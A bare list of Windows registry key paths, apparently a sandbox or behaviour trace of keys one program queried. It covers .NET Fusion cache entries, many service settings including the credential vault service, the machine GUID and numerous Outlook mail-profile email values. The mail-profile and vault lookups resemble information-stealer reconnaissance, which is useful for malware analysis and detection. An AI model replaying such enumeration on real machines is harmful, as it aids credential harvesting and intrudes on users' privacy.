HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
